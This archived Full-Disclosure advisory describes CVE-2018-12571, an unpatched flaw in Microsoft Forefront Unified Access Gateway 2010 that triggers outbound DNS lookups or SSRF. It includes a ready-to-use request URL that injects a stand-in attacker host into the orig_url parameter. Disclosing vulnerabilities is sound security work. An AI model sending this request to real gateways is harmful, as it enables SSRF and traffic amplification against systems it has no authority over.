lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 20 Jun 2018 09:22:39 +0300
From: okan coskun <okancoskun2@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Microsoft Forefront Unified Access Gateway 2010 External DNS
	Interaction

# Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External
DNS Interaction
# Vendor Homepage: https://www.microsoft.com/
# Version: 2010
# CVE : CVE-2018-12571
# Proof of Concept #1

Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to
trigger outbound DNS queries for arbitrary hosts via a comma-separated list
of URLs in the orig_url parameter, possibly causing a traffic amplification
and/or SSRF outcome.

/uniquesig697e96fe58e5694d9b118768d8189a4c/uniquesig0/InternalSite/InitParams.aspx?referrer=/InternalSite/StartApp.asp&resource%5Fid=8B92B86E36904E2FA83C890F8C864A50&login%5Ftype=0&site%5Fname=test&secure=0&URLHASH=47c74c53%2Dfaae%2D41ae%2D89f1%2D1eb6eff34091&*orig%5Furl=http%3A%2F%2FATTACKER.SITE.COM
<http://2FATTACKER.SITE.COM>%2Ftest*

# Fixes

It will not be patched by Microsoft.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists